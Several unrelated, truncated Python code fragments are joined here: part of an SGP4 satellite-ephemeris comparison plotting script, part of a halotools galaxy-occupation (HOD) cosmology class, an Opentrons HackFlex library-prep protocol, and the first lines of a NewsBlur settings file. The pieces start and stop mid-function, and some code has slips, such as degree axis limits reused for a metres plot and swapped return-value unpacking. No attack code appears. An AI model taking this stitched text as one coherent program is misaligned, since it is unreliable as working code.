delta = max(abs(aiaa_ver_sats[sat][2][time][0] - ansi_ver_sats[sat][2][time][0]),
abs(aiaa_ver_sats[sat][2][time][1] - ansi_ver_sats[sat][2][time][1]),
abs(aiaa_ver_sats[sat][2][time][2] - ansi_ver_sats[sat][2][time][2]))
except:
delta = 0
if delta > maxdelta:
maxdelta = delta
verif_points[sat] = maxdelta * 1000 # Convert to meters
verif_annot.append(sat)
# Max difference in verification ephemerides ##################################
fig, axo = plt.subplots(1, 1)
fig.canvas.set_window_title('Verif. ephemeris difference')
for i, sat in enumerate(list(aiaa_ver_sats.keys())):
axo.plot(i, verif_points[sat], c='r', marker='o', ls='', mew=0.0, markersize=8, alpha=0.7)
axo.annotate(sat, (i, verif_points[sat]))
axo.set_xlim(-1, len(aiaa_ver_sats.keys()) + 5)
axo.set_yscale('log')
axo.autoscale(True, 'y', None)
axo.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axo.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axo.set_title('Max difference in ephemerides: AIAA (zero) vs ANSI (red)')
axo.set_xlabel('Satellite, number')
axo.set_ylabel('Difference, m')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Solving Kepler's Equation for satellite 23333 ###############################
aiaa_23333_t = []
aiaa_23333_i = []
ansi_23333_i = []
aiaa_23333_m = []
ansi_23333_m = []
for time in aiaa_ver_sats['23333'][2].keys():
aiaa_23333_t.append(time)
aiaa_23333_i.append(aiaa_ver_sats['23333'][2][time][5])
aiaa_23333_m.append(aiaa_ver_sats['23333'][2][time][9])
ansi_23333_i.append(ansi_ver_sats['23333'][2][time][5])
ansi_23333_m.append(ansi_ver_sats['23333'][2][time][9])
fig, (axi, axm) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('Kepler\'s Equation for 23333')
xmin = 240
xmax = 720
xticksmin = range(xmin, xmax + 1, 60)
xticksmaj = range(xmin, xmax + 1, 120)
y2min = 0
y2max = 360
y2ticksmin = [30, 60, 210, 240, 300, 330]
y2ticksmaj = [90, 180, 270, 360]
axi.plot(aiaa_23333_t, aiaa_23333_i, c='k', marker='', ls=':')
axi.plot(aiaa_23333_t, ansi_23333_i, c='b', marker='', ls='-', alpha=0.6)
axm.plot(aiaa_23333_t, aiaa_23333_m, c='k', marker='', ls=':')
axm.plot(aiaa_23333_t, ansi_23333_m, c='g', marker='', ls='-', alpha=0.6)
axi.set_xlim(xmin, xmax)
axi.set_xticks(xticksmin, True);
axi.set_xticks(xticksmaj, False);
axi.autoscale(True, 'y', None)
axi.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axi.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axi.set_title('Kepler\'s for 23333, AIAA (black dashed) vs ANSI (color)')
axi.set_ylabel('Inclination, deg')
axm.set_xticks(xticksmin, True);
axm.set_xticks(xticksmaj, False);
axm.set_ylim(y2min, y2max)
axm.set_yticks(y2ticksmin, True);
axm.set_yticks(y2ticksmaj, False);
axm.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axm.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axm.set_xlabel('Time from epoch, min')
axm.set_ylabel('Mean anomaly, deg')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Lunar-solar modifications for Satellite 23599 ###############################
aiaa_argper = []
ansi_argper = []
aiaa_pos23599_x1 = []
aiaa_pos23599_yx = []
aiaa_pos23599_yy = []
aiaa_pos23599_yz = []
ansi_pos23599_yx = []
ansi_pos23599_yy = []
ansi_pos23599_yz = []
for time in aiaa_ver_sats['23599'][2].keys():
aiaa_pos23599_x1.append(time)
aiaa_argper.append(aiaa_ver_sats['23599'][2][time][7])
ansi_argper.append(ansi_ver_sats['23599'][2][time][7])
aiaa_pos23599_yx.append(aiaa_ver_sats['23599'][2][time][0])
aiaa_pos23599_yy.append(aiaa_ver_sats['23599'][2][time][1])
aiaa_pos23599_yz.append(aiaa_ver_sats['23599'][2][time][2])
ansi_pos23599_yx.append(ansi_ver_sats['23599'][2][time][0])
ansi_pos23599_yy.append(ansi_ver_sats['23599'][2][time][1])
ansi_pos23599_yz.append(ansi_ver_sats['23599'][2][time][2])
fig, (axa, axp) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('L-S mods for 23599')
xmin = int(min(aiaa_pos23599_x1))
xmax = int(max(aiaa_pos23599_x1))
xticksmin = range(xmin, xmax + 1, 20)
xticksmaj = range(xmin, xmax + 1, 60)
axa.plot(aiaa_pos23599_x1, aiaa_argper, c='k', marker='', ls=':')
axa.plot(aiaa_pos23599_x1, ansi_argper, c='r', marker='', ls='-', alpha=0.6)
axa.set_xlim(xmin, xmax)
axa.set_xticks(xticksmin, True);
axa.set_xticks(xticksmaj, False);
axa.autoscale(True, 'y', None)
axa.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axa.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axa.set_title('L-S mod. for 23599, AIAA (black dashed) vs ANSI (color)')
axa.set_ylabel('Argument of perigee, deg')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yx, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yy, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, aiaa_pos23599_yz, c='k', marker='', ls=':')
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yx, c='b', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yy, c='g', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_pos23599_x1, ansi_pos23599_yz, c='m', marker='', ls='-', alpha=0.6)
axp.set_xticks(xticksmin, True);
axp.set_xticks(xticksmaj, False);
axp.autoscale(True, 'y', None)
axp.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axp.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axp.set_xlabel('Time from epoch, min')
axp.set_ylabel('Position components, km')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
# Lyddane Choice Modification for Satellite 14128 #############################
incl_bar = []
aiaa_14128_t = []
aiaa_14128_i = []
ansi_14128_i = []
dpy_14128 = []
dpz_14128 = []
for time in aiaa_ver_sats['14128'][2].keys():
incl_bar.append(11.4592)
aiaa_14128_t.append(time)
aiaa_14128_i.append(aiaa_ver_sats['14128'][2][time][5])
ansi_14128_i.append(ansi_ver_sats['14128'][2][time][5])
dpy_14128.append(aiaa_ver_sats['14128'][2][time][1] - ansi_ver_sats['14128'][2][time][1])
dpz_14128.append(aiaa_ver_sats['14128'][2][time][2] - ansi_ver_sats['14128'][2][time][2])
fig, (axi, axp) = plt.subplots(2, 1, sharex=True)
fig.canvas.set_window_title('Lyddane Choice for 14128')
xmin = 0
xmax = 2880
xticksmin = range(xmin, xmax + 1, 60)
xticksmaj = range(xmin, xmax + 1, 240)
axi.plot(aiaa_14128_t, incl_bar, c='k', marker='', ls='-', lw=0.5)
axi.plot(aiaa_14128_t, aiaa_14128_i, c='k', marker='', ls=':')
axi.plot(aiaa_14128_t, ansi_14128_i, c='b', marker='', ls='-', alpha=0.6)
axp.plot(aiaa_14128_t, dpy_14128, c='g', marker='', ls='-')
axp.plot(aiaa_14128_t, dpz_14128, c='m', marker='', ls='-')
axi.set_xlim(xmin, xmax)
axi.set_xticks(xticksmin, True);
axi.set_xticks(xticksmaj, False);
axi.autoscale(True, 'y', None)
axi.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axi.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axi.set_title('Lyddane Choice for 14128, AIAA (black dashed) vs ANSI (color)')
axi.set_ylabel('Inclination, deg')
axp.set_xticks(xticksmin, True);
axp.set_xticks(xticksmaj, False);
axp.set_ylim(y2min, y2max)
axp.set_yticks(y2ticksmin, True);
axp.set_yticks(y2ticksmaj, False);
axp.grid(which='major', axis='both', ls='dashed', alpha=0.7)
axp.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
axp.set_xlabel('Time from epoch, min')
axp.set_ylabel('Position difference, m')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
def fullcat():
print('Running AIAA-2006-6753 full catalogue mode...')
start = datetime.datetime.now()
print(subprocess.Popen([os.path.join(os.getcwd(), aiaa_binary), 'i', 'c', fullcat_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
stop = datetime.datetime.now()
global tdiff_ic
tdiff_ic = stop - start
print('Running libsgp4ansi full catalogue mode...')
start = datetime.datetime.now()
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'c', fullcat_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
stop = datetime.datetime.now()
global tdiff_ansic
tdiff_ansic = stop - start
print('Loading full catalogue data...')
with open(aiaa_out_filename) as f:
aiaa_file = f.readlines()
with open(ansi_out_filename) as f:
ansi_file = f.readlines()
aiaa_sats = {}
ansi_sats = {}
for i, line in enumerate(aiaa_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
aiaa_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
aiaa_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(aiaa_file) - 1)):
progress = int(i / (len(aiaa_file) - 1) * 20)
print('AIAA: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * (20 - progress), i, len(aiaa_file) - 1,
len(aiaa_sats.keys())), end='')
print('')
for i, line in enumerate(ansi_file):
m = sat_re.findall(line.strip())
if m != []:
current_sat = m[0][0]
ansi_sats[current_sat] = [float(m[0][1]), 0.0, {}]
else:
try:
vals = list(map(float, line.split()))
except ValueError as e:
print('\n[{0}] {1}'.format(i, str(e)))
ansi_sats[current_sat][2][vals[0]] = vals[1:]
if ((i % 1000 == 0) | (i == len(ansi_file) - 1)):
progress = int(i / (len(ansi_file) - 1) * 20)
print('ANSI: [{0}] {1:7}/{2:7} lines, {3:5} satellites\r'.format(
'=' * progress + ' ' * | |
self.model = HodModelFactory(
centrals_occupation=cens_occ,
centrals_profile=TrivialPhaseSpace(redshift=z),
satellites_occupation=sats_occ,
satellites_profile=sat_phase_space)
self.populated_once = False # cover for loadign new ones
def get_assembias_key(self, gal_type):
'''
Helper function to get the key of the assembly bias strength keys, as they are obscure to access.
:param gal_type:
Galaxy type to get Assembias strength. Options are 'centrals' and 'satellites'.
:return:
'''
assert gal_type in {'centrals', 'satellites'}
return self.model.input_model_dictionary['%s_occupation' % gal_type]._get_assembias_param_dict_key(0)
# TODO this isn't a traditional observable, so I can't use the same decorator. Not sure how to handle that.
# TODO little h's here and in hod?
def calc_mf(self, mass_bin_range=(9, 16), mass_bin_size=0.01, min_ptcl=200):
"""
Get the mass function of the halo catalog.
:param mass_bin_range
A tuple of the lwoer and upper bounds of the log mass bins. Default is (9,16)
:param mass_bin_size:
Mass binnig size to use. Default is 0.1 dex
:param min_ptcl:
Minimum number of particles in a halo. Default is 200
:return:
mass_function, the mass function of halocat.
"""
try:
assert self.halocat is not None
except AssertionError:
raise AssertionError("Please load a halocat before calling calc_mf.")
if hasattr(self, '_mf_min_%d'%min_ptcl):
return getattr(self, '_mf_min_%d'%min_ptcl)
#if hasattr(self, '_last_halocat_id'):
# if self._last_halocat_id == id(self.halocat):
# return self._last_mf
masses = self.halocat.halo_table[self.halocat.halo_table['halo_upid'] == -1]['halo_mvir']
masses = masses[masses > min_ptcl * self.pmass]
mass_bins = np.logspace(mass_bin_range[0], mass_bin_range[1],
int((mass_bin_range[1] - mass_bin_range[0]) / mass_bin_size) + 1)
mf = np.histogram(masses, mass_bins)[0]
#self._last_mf = mf
#self._last_halocat_id = id(self.halocat)
setattr(self, '_mf_min_%d'%min_ptcl, mf)
return mf
# TODO same concerns as above
def _add_logMmin(self, nd, min_ptcl=200):
"""
In the fixed number density case, find the logMmin value that will match the nd given hod_params
:param: hod_params:
The other parameters besides logMmin
:param cat:
the catalog in question
:return:
None. hod_params will have logMmin added to it.
"""
# cat.populate(hod_params) #may be overkill, but will ensure params are written everywhere
logMmin_bounds = (12.0, 15.0)
hod_params = self.model.param_dict.copy()
def func(logMmin, hod_params):
#print logMmin
hod_params.update({'logMmin': logMmin})
return (self.calc_analytic_nd(hod_params, min_ptcl = min_ptcl) - nd) ** 2
res = minimize_scalar(func, bounds=logMmin_bounds, args=(hod_params,), options={'maxiter': 100},
method='Bounded')
# assuming this doens't fail
#print 'logMmin', res.x
self.model.param_dict['logMmin'] = res.x
def calc_hod(self, params={}, mass_bin_range=(9, 16), mass_bin_size=0.01, component='all'):
"""
Calculate the analytic HOD for a set of parameters
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:param mass_bin_range
A tuple of the lwoer and upper bounds of the log mass bins. Default is (9,16)
:param mass_bin_size:
Mass binnig size to use. Default is 0.1 dex
:param component:
Which HOD component to compute for. Acceptable are "all" (default), "central" or "satellite"
:return:
"""
assert component in {'all', 'central', 'satellite'}
try:
assert self.model is not None
except AssertionError:
raise AssertionError("Please load a model before calling calc_hod.")
bins = np.logspace(mass_bin_range[0], mass_bin_range[1],
int((mass_bin_range[1] - mass_bin_range[0]) / mass_bin_size) + 1)
bin_centers = (bins[:-1] + bins[1:]) / 2
self.model.param_dict.update(params)
cens_occ, sats_occ = self.model.model_dictionary['centrals_occupation'], self.model.model_dictionary[
'satellites_occupation']
for key, val in params.iteritems():
if key in cens_occ.param_dict:
cens_occ.param_dict[key] = val
if key in sats_occ.param_dict:
sats_occ.param_dict[key] = val
if component == 'all' or component == 'central':
cen_hod = getattr(cens_occ, "baseline_mean_occupation", cens_occ.mean_occupation)(prim_haloprop=bin_centers)
if component == 'central':
return cen_hod
if component == 'all' or component == 'satellite':
sat_hod = getattr(sats_occ, "baseline_mean_occupation", sats_occ.mean_occupation)(prim_haloprop=bin_centers)
if component == 'satellite':
return sat_hod
return cen_hod + sat_hod
def calc_analytic_nd(self, params={}, min_ptcl = 200):
"""
Calculate the number density from the HOD and Mass function, rather than recovering from a populatedd catalog.
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:return: nd, a float that represents the analytic number density
"""
mf = self.calc_mf(min_ptcl=min_ptcl)
hod = self.calc_hod(params)
return np.sum(mf * hod) / ((self.Lbox) ** 3) # /self.h)**3)
def calc_xi_mm(self, rbins, n_cores='all', use_corrfunc=False):
"""
Calculate the matter-matter realspace autocorrelation function
:param rbins:
radial binning to use during computation
:param n_cores:
number of cores to use during compuation. Must be an integer or 'all'. Default is 'all'
:param use_corrfunc:
Boolean, whether or not to use corrfunc if it is available. Default is true. If false, will use
halotools.
:return:
"""
if hasattr(self, '_xi_mm_bins') and np.all(self._xi_mm_bins == rbins): # we have this one cached
return self._xi_mm
if use_corrfunc:
assert CORRFUNC_AVAILABLE
n_cores = self._check_cores(n_cores)
x, y, z = [self.halocat.ptcl_table[c] for c in ['x', 'y', 'z']]
pos = return_xyz_formatted_array(x, y, z, period=self.Lbox)
if use_corrfunc:
out = xi(self.Lbox / self.h, n_cores, rbins,
x.astype('float32') / self.h, y.astype('float32') / self.h,
z.astype('float32') / self.h)
xi_all = out[4] # returns a lot of irrelevant info
# TODO jackknife with corrfunc?
else:
xi_all = tpcf(pos / self.h, rbins, period=self.Lbox / self.h, num_threads=n_cores,
estimator='Landy-Szalay')
# cache, so we don't ahve to repeat this calculation several times.
self._xi_mm_bins = rbins
self._xi_mm = xi_all
return xi_all
def populate(self, params={}, min_ptcl=200):
'''
Populate the stored halocatalog with a new realization. Load must be called first.
:param params:
HOD parameters. Only those that are changed from the original are required; the rest will remain the default.
:param min_ptcl:
Minimum number of particles which constitutes a halo.
:return: None
'''
try:
assert self.model is not None
except AssertionError:
raise AssertionError("Please call load before calling populate.")
self.model.param_dict.update(params)
# might be able to check is model has_attr mock.
if self.populated_once:
self.model.mock.populate(Num_ptcl_requirement=min_ptcl)
else:
self.model.populate_mock(self.halocat, Num_ptcl_requirement=min_ptcl)
self.populated_once = True
# TODO how to handle analytic v observed nd
@observable()
def calc_number_density(self):
'''
Return the number density for a populated box.
:param: halo
Whether to calculate hte number density of halos instead of galaxies. Default is false.
:return: Number density of a populated box.
'''
return self.model.mock.number_density #* self.h ** 3
# TODO do_jackknife to cov?
@observable()
def calc_xi(self, rbins, n_cores='all', do_jackknife=False, use_corrfunc=False, jk_args={}, halo=False, PBC=True):
'''
Calculate a 3-D correlation function on a populated catalog.
:param rbins:
Radial bins for the correlation function.
:param n_cores
Number of cores to use. default is 'all'
:param do_jackknife:
Whether or not to do a jackknife along with the xi calculation. Generally slower. Not supported with
with corrfunc at present.
:param use_corrfunc:
Whether or not to use the halotools function to calculate xi, or Manodeep's corrfunc. Corrfunc is not
available on all systems and currently jackknife is not supported.
:param jk_args
Dictionary of arguements for the jackknife call.
:param halo
Whether to calculate the halo correlation instead of the galaxy correlation. Default is False.
:return: xi:
len(rbins) 3-D correlation function
xi_cov (if do_jacknife and ! use_corrfunc):
(len(rbins), len(rbins)) covariance matrix for xi.
'''
if PBC:
period = self.Lbox
else:
period = None
assert not (do_jackknife and use_corrfunc) # can't both be true.
n_cores = self._check_cores(n_cores)
if halo:
x, y, z = [self.model.mock.halo_table[c] for c in ['halo_x', 'halo_y', 'halo_z']]
else:
x, y, z = [self.model.mock.galaxy_table[c] for c in ['x', 'y', 'z']]
pos = return_xyz_formatted_array(x, y, z, period=self.Lbox)
if use_corrfunc:
'''
# write bins to file
# unforunately how corrfunc has to work
# TODO A custom binfile, or one that's already written?
bindir = path.dirname(path.abspath(__file__)) # location of files with bin edges
with open(path.join(bindir, './binfile'), 'w') as f:
for low, high in zip(rbins[:-1], rbins[1:]):
f.write('\t%f\t%f\n' % (low, high))
# countpairs requires casting in order to work right.
xi_all = countpairs_xi(self.model.mock.Lbox / self.h, n_cores, path.join(bindir, './binfile'),
x.astype('float32') / self.h, y.astype('float32') / self.h,
z.astype('float32') / self.h)
xi_all = np.array(xi_all, dtype='float64')[:, 3]
'''
out = xi(self.model.mock.Lbox , n_cores, rbins,
x.astype('float32') , y.astype('float32') ,
z.astype('float32') )
xi_all = out[4] # returns a lot of irrelevant info
# TODO jackknife with corrfunc?
else:
if do_jackknife:
np.random.seed(int(time()))
if not jk_args:
# TODO customize these?
n_rands = 5
n_sub = 5
if 'rand_scalecut' in jk_args:
n_rands = [25, 5]
else:
n_rands = jk_args['n_rands']
n_sub = jk_args['n_sub']
if 'rand_scalecut' in jk_args: # do the jk differently for different scale cuts
assert hasattr(n_rands, "__iter__"), "rand_scalecut called but n_rands is not iterable."
rand_scalecut = jk_args['rand_scalecut']
rbins = np.array(rbins)
rbins_small, rbins_large = list(rbins[rbins < rand_scalecut]), list(rbins[rbins >= rand_scalecut])
rbins_large.insert(0, rbins_small[-1]) # make sure the middle bin is not cut
xis, covs | |
<reponame>spencer-siddons/Moeller_Opentrons_protocol_library
from opentrons import protocol_api
from numpy import ceil
metadata = {'apiLevel': '2.5',
'author': '<NAME>'}
# Set to `True` to perform a short run, with brief pauses and only
# one column of samples
test_run = True
if test_run:
pause_bind = 5
pause_mag = 3
pause_dry = 5
pause_elute = 5
# Limit columns
cols = ['A1', 'A2']
else:
pause_bind = 5*60
pause_mag = 3*60
pause_dry = 5*60
pause_elute = 5*60
# Limit columns
cols = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6',
'A7', 'A8', 'A9', 'A10', 'A11', 'A12']
# bead aspiration flow rate
bead_flow = .25
# wash mix mutliplier
wash_mix = 5
# Wash 1 (TWB) columns
twb_cols = ['A3', 'A4']
# PCR MM columns
pcr_cols = ['A4', 'A5']
# EtOH columns
eth_cols = ['A6', 'A7', 'A8']
# define magnet engagement height for plates
mag_engage_height = 6
def bead_mix(pipette,
plate,
cols,
tiprack,
n=5,
mix_vol=200,
drop_tip=False):
for col in cols:
pipette.pick_up_tip(tiprack.wells_by_name()[col])
pipette.mix(n,
mix_vol,
plate[col].bottom(z=2))
pipette.blow_out(plate[col].top())
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return()
def remove_supernatant(pipette,
plate,
cols,
tiprack,
waste,
super_vol=600,
rate=0.25,
bottom_offset=2,
drop_tip=False):
# remove supernatant
for col in cols:
vol_remaining = super_vol
# transfers to remove supernatant:
pipette.pick_up_tip(tiprack.wells_by_name()[col])
transfers = int(ceil(super_vol/190))
while vol_remaining > 0:
transfer_vol = min(vol_remaining, 190)
if vol_remaining <= 190:
z_height = bottom_offset
else:
z_height = 4
pipette.aspirate(transfer_vol,
plate[col].bottom(z=z_height),
rate=rate)
pipette.air_gap(10)
pipette.dispense(transfer_vol + 10, waste.top())
vol_remaining -= transfer_vol
pipette.blow_out()
# we're done with these tips at this point
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return()
def add_buffer(pipette,
plate,
cols,
wash_vol,
source_wells,
source_vol,
tip=None,
tip_vol=300,
remaining=None,
drop_tip=True):
if tip is not None:
pipette.pick_up_tip(tip)
else:
pipette.pick_up_tip()
source_well = source_wells[0]
if remaining is None:
remaining = source_vol
transfers = int(ceil(wash_vol/(tip_vol-10)))
transfer_vol = wash_vol/transfers
for col in cols:
for i in range(0,transfers):
# print("%s µL remaining in %s" % (remaining, source_well))
# print("Transferring %s to %s" % (transfer_vol, col))
pipette.aspirate(transfer_vol,
source_well)
pipette.air_gap(10)
pipette.dispense(transfer_vol + 10,
plate[col].top())
remaining -= transfer_vol
if remaining < transfer_vol + source_vol*0.1:
# print("Only %s remaining in %s\n" % (remaining, source_well))
source_wells.pop(0)
source_well = source_wells[0]
# print("Moving on to %s\n" % source_well)
remaining = source_vol
pipette.blow_out()
if drop_tip:
pipette.drop_tip()
else:
pipette.return_tip()
return(remaining, source_wells)
def bead_wash(# global arguments
protocol,
magblock,
pipette,
plate,
cols,
# super arguments
super_waste,
super_tiprack,
# wash buffer arguments
source_wells,
source_vol,
# mix arguments
mix_tiprack,
# optional arguments
super_vol=600,
rate=bead_flow,
super_bottom_offset=2,
drop_super_tip=True,
wash_vol=300,
remaining=None,
wash_tip=None,
drop_wash_tip=True,
mix_vol=200,
mix_n=wash_mix,
drop_mix_tip=False,
mag_engage_height=mag_engage_height,
pause_s=pause_mag
):
# Wash
# This should:
# - pick up tip from position 7
# - pick up 190 µL from the mag plate
# - air gap
# - dispense into position 11
# - repeat x
# - trash tip
# - move to next column
# - disengage magnet
# remove supernatant
remove_supernatant(pipette,
plate,
cols,
super_tiprack,
super_waste,
super_vol=super_vol,
rate=bead_flow,
bottom_offset=super_bottom_offset,
drop_tip=drop_super_tip)
# disengage magnet
magblock.disengage()
# This should:
# - Pick up tips from column 3 of location 2
# - pick up isopropanol from position 5 column 3
# - dispense to `cols` in mag plate
# - pick up isopropanol from position 5 column 4
# - dispense to `cols` in mag plate
# - drop tips at end
# add isopropanol
wash_wells, wash_remaining = add_buffer(pipette,
plate,
cols,
wash_vol=wash_vol,
source_wells=source_wells,
source_vol=source_vol,
tip=wash_tip,
remaining=remaining,
drop_tip=drop_wash_tip)
# This should:
# - grab a tip from position 8
# - mix 5 times the corresponding well on mag plate
# - blow out
# - return tip
# - do next col
# - engage magnet
# mix
bead_mix(pipette,
plate,
cols,
mix_tiprack,
n=mix_n,
mix_vol=mix_vol,
drop_tip=drop_mix_tip)
# engage magnet
magblock.engage(height_from_base=mag_engage_height)
protocol.delay(seconds=pause_s)
return(wash_wells, wash_remaining)
def run(protocol: protocol_api.ProtocolContext):
# ### HackFlex Illumina-compatible library prep protocol
# ### Deck
# 1. samples; libraries
# 2. reagent reservoir
# 3. reagent strip tubes
# 4. 300 tips (wash); 200f tips (elute)
# 5. 10f tips (samples)
# 6. i7 primers
# 7. waste
# 8. 300 tips (reagents)
# 9. 10f tips (primers)
# 10. mag module
# 11. 20 tips (reagents)
# 12. trash
# define custom labware for strip tubes block
# reagent strip tubes:
# 1: BLT 150 µL
# 2: TSB 150 µL
# 3: i5 primers 150 µL
# 4: PCR MM 200 µL
# 5: PCR MM 200 µL
# buffer reservoirs:
# 1: TB1 (2.5 mL)
# 2: TWB (10 mL)
# 3: TWB (10 mL)
# 4: H2O (8 mL)
# 5: beads (6 mL)
# 6: 80% EtOH
# 7: 80% EtOH
# 8: 80% EtOH
# ### Setup
protocol.home()
# define deck positions and labware
# define hardware modules
magblock = protocol.load_module('Magnetic Module', 10)
magblock.disengage()
# tips
tiprack_samples = protocol.load_labware('opentrons_96_filtertiprack_10ul',
5)
tiprack_buffers = protocol.load_labware('opentrons_96_tiprack_300ul',
8)
tiprack_wash = protocol.load_labware('opentrons_96_tiprack_300ul',
4)
tiprack_primers = protocol.load_labware('opentrons_96_filtertiprack_10ul',
9)
tiprack_reagents = protocol.load_labware('opentrons_96_tiprack_20ul',
11)
# reagents
# should be new custom labware with strip tubes
reagents = protocol.load_labware('opentrons_96_aluminumblock_generic_pcr_strip_200ul',
3, 'reagents')
buffers = protocol.load_labware('nest_12_reservoir_15ml',
2, 'wash buffers')
waste = protocol.load_labware('nest_1_reservoir_195ml',
7, 'liquid waste')
# plates
samples = protocol.load_labware('biorad_96_wellplate_200ul_pcr',
1, 'samples')
i7_primers = protocol.load_labware('biorad_96_wellplate_200ul_pcr',
6, 'i7 primers')
# load plate on magdeck
# mag_plate = magblock.load_labware('vwr_96_wellplate_1000ul')
mag_plate = magblock.load_labware('biorad_96_wellplate_200ul_pcr')
# initialize pipettes
pipette_left = protocol.load_instrument('p300_multi',
'left',
tip_racks=[tiprack_buffers])
pipette_right = protocol.load_instrument('p10_multi',
'right',
tip_racks=[tiprack_reagents])
# TWB wash wells
twb_wells = [buffers[x] for x in twb_cols]
# PCR MM wells
pcr_wells = [reagents[x] for x in pcr_cols]
# EtOH wells
eth_wells = [buffers[x] for x in eth_cols]
# DNA plate
# Step 1: Tagmentation
# Diluted BLT: 1 mL; 120 (150 µL) per tip
# TB1: 2.4 mL; 300 (350 µL) per tip
# add TB1.
# buffer tips 1
pipette_left.distribute(25,
buffers['A1'],
[mag_plate[x] for x in cols],
touch_tip=False,
disposal_volume=10,
new_tip='once',
trash=True)
# add BLT
# reagent tips 2
# mix BLT first
pipette_right.pick_up_tip()
pipette_right.mix(10,
10,
reagents['A1'])
pipette_right.transfer(10,
reagents['A1'],
[mag_plate[x] for x in cols],
mix_before=(2,10),
new_tip='never')
pipette_right.drop_tip()
# add sample
for col in cols:
pipette_right.pick_up_tip(tiprack_samples[col])
pipette_right.transfer(10,
samples[col],
mag_plate[col],
mix_after=(5, 10),
new_tip='never',
trash=False)
pipette_right.return_tip()
# Prompt user to remove plate and run on thermocycler
protocol.pause('Remove plate from magblock, seal, vortex, and run '
'program TAG on thermocycler. Then spin down, unseal, '
'and return to magblock.')
# Step 2: Stop reaction
# TSB: 1 mL; 120 (150 µL) per tip
# add TSB to each sample.
# Prompt user to remove plate and run on thermocycler
### Is this step going to cross-contaminate? Seems wasteful to take.
### new tip for each sample. z = -1 meant to help.
# reagent tips 2
pipette_right.transfer(10,
reagents['A2'],
[mag_plate[x].top(z=-1) for x in cols],
touch_tip=True,
new_tip='once')
protocol.pause('Remove plate from magblock, seal, vortex, and run '
'program PTC on thermocycler. Then spin down, unseal, '
'and return to magblock.')
# Step 3: Cleanup
# TWB: 20 mL; 1200 (1500 µL) per tip
# Magnet wash 2X
# bind for specified length of time
protocol.comment('Binding beads to magnet.')
magblock.engage(height_from_base=mag_engage_height)
protocol.delay(seconds=pause_mag)
# ### Do first wash: 100 µL TWB
# buffer tips 2
protocol.comment('Doing wash #1.')
twb_remaining, twb_wells = bead_wash(# global arguments
protocol,
magblock,
pipette_left,
mag_plate,
cols,
# super arguments
waste['A1'],
tiprack_wash,
# wash buffer arguments,
twb_wells,
10000/8,
# mix arguments
tiprack_wash,
# optional arguments
wash_vol=100,
super_vol=60,
drop_super_tip=False,
mix_n=wash_mix,
mix_vol=90,
remaining=None)
# ### Do second wash: 100 µL TWB
# buffer tips 3
protocol.comment('Doing wash #2.')
twb_remaining, twb_wells = bead_wash(# global arguments
protocol,
magblock,
pipette_left,
mag_plate,
cols,
# super arguments
waste['A1'],
tiprack_wash,
# wash buffer arguments,
twb_wells,
10000/8,
# mix arguments
tiprack_wash,
# optional arguments
wash_vol=100,
super_vol=100,
drop_super_tip=False,
mix_n=wash_mix,
mix_vol=90,
remaining=twb_remaining)
# remove supernatant
remove_supernatant(pipette_left,
mag_plate,
cols,
tiprack_wash,
waste['A1'],
super_vol=120,
rate=bead_flow,
bottom_offset=.5,
drop_tip=False)
magblock.disengage()
# Step 3: amplification
# MM: 3 mL; 350 (400 µL) per tip
# buffer tips 4
pcr_wells, pcr_remaining = add_buffer(pipette_left,
mag_plate,
cols,
30,
pcr_wells,
200,
tip=None,
tip_vol=300,
remaining=None,
drop_tip=True)
# plate: primers i5
# reagent tips 3
pipette_right.transfer(10,
reagents['A5'],
[mag_plate[x].top(z=-1) for x in cols],
touch_tip=True,
new_tip='once')
# plate: primers i7
for col in cols:
pipette_right.pick_up_tip(tiprack_primers[col])
pipette_right.transfer(10,
i7_primers[col],
mag_plate[col],
mix_after=(5, 10),
touch_tip=True,
new_tip='never',
trash=False)
pipette_right.drop_tip()
# Prompt user to remove plate and run on thermocycler
| |
<reponame>ap0ught/NewsBlur<filename>settings.py
import sys
import os
# ===========================
# = Directory Declaractions =
# ===========================
CURRENT_DIR = os.path.dirname(__file__)
NEWSBLUR_DIR = CURRENT_DIR
TEMPLATE_DIRS = (os.path.join(CURRENT_DIR, 'templates'),
os.path.join(CURRENT_DIR, 'vendor/zebra/templates'))
